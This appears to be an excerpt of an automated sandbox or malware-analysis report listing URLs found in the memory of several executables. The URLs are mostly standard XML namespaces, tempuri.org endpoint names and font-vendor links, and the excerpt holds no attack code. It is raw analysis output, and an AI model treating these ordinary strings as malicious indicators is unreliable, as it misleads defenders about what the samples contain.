Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: ohcompetitive.exe, 0000000D.00000002.726837895.0000000003101000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: n7660022.exe, 0000001E.00000002.680833922.0000000002F26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16V
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Responseh
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002F26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002F26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4h
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ohcompetitive.exe, 0000000D.00000003.494872998.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494716862.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmld
Source: explorer.exe, 00000001.00000000.393861047.000000000091F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: ohcompetitive.exe, 0000000D.00000003.489340121.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: ohcompetitive.exe, 0000000D.00000003.489340121.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.comal
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: ohcompetitive.exe, 0000000D.00000003.545548318.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518048175.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519426984.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.541640595.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521005742.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.540614622.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521203636.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519704126.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518710431.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518583858.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519898696.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.511303695.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518863186.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519072643.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.774280885.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518224673.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.517733333.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.517949172.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.538905369.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518336828.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.546200631.0000000005A04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: ohcompetitive.exe, 0000000D.00000003.511083697.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com.TTF
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: ohcompetitive.exe, 0000000D.00000003.511303695.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.511458966.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.511083697.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ohcompetitive.exe, 0000000D.00000003.517949172.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518336828.00000000059F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
